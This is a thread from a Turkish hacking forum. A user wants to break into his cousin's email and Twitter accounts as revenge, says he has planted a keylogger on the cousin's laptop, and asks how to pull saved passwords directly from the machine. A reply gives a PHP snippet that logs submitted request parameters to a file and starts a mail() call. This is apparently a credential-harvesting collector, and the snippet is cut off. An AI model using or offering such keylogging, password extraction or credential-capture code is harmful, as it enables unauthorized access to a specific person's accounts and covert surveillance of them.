mail şifre kırma

LA_LkrS2AmzNG

Yeni üye
10 Ocak 2010
46
0
merhabalar

ben kuzenime bir oyun oynamak istiyorum bundan birkaç ay önce bana çok hoş bir kazık attı ve world of warcraft hesabımı çaldı. ben de onun twitter hesabını ve mail adresinin şifrelerini kırmak istiyorum. fakat nasıl yapacağımı bilmiyorum. şuan onun evindeyim ve yanımda da onun laptobu var nasıl yapabilirim bana yardım edebilir misiniz?

şimdiden teşekkür ederim

not messenpass ı denedim kendi mail adresinin şifresine ulaşamadım.

LA_LkrS2AmzNG

Yeni üye
10 Ocak 2010
46
0
çok teşekkür ederim peki ben keylogger yerleştirdim fakat kuzenim birkaç gün sonra gelecek o gelmeden şifreyi öğrenebileceğim başka bir yöntem var mı yani onun şifreyi girmesini beklemeden direkt bilgisayardan öğrenebilme gibi bir imkan mesela youtubedan izlediğimiz dosyalar kaydoluyordu abidik gubidik bir yere mail ve twitter şifreleri için böyle bir yol var mı?

LA_LkrS2AmzNG

Yeni üye
10 Ocak 2010
46
0
birde oluşturduğum exe dosyasına kuzenimin bilgisayarından tıladım yaptığım hata ekrana geldi tamam diyip çıktım fakat sonra virüs programı dosyayı sildi birşey olur mu? yoksa yeniden yüklemem mi gerekir keylogger ı

esvedahval

Üye
16 Eki 2011
103
0
Başkent
Ben olduğu gibi verme taraftarı değilim hiç bir zaman. O yüzden şimdilik şu kodu veriyorum araştırmasını yaparsan çok basittir bulursun:

<?
$kayit = fopen("ekledik.txt","a");
foreach($_GET as $variable => $value) {
fwrite($kayit,$variable . ": " . $value . "\n");
}
fwrite($kayit,"---------------------------\n");
fclose($kayit);
mail("

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.